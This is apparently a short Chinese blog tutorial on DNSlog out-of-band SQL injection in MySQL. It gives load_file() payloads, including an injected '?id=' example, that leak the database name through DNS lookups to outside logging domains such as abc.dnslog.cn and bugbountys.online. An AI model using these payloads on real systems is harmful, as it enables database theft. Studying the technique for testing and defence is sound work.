当DNS服务器进行域名解析之后,会生成一个解析日志。利用日志看回显,讲盲注变成报错注入
原理
假设提供的域名是abc.dnslog.cn
我们ping admin.abc.dnslog.cn 就会在生成一个临时日志,并回显出来
我们在mysql里测试select concat((select database()),'.abc.dnslog.cn');发现成功
利用load_file读文件
select load_file(concat('//',(select database()),'.abc.dnslog.cn/1.txt'));
由于dns大小写不敏感,这里加上hex编码
?id=1 and select load_file(concat('//',(select hex(database())),'.abc.dnslog.cn/1.txt'));
之后就可以愉快的暴表爆字段暴内容了
前提
1.[mysqld]
secure_file_priv=""
2.能上网
select load_file('\\\\baidu.admin.36.dns.bugbountys.online\\abc');
select load_file(concat('//',database(),'.admin.36.dns.bugbountys.online/abc'));
Comments NOTHING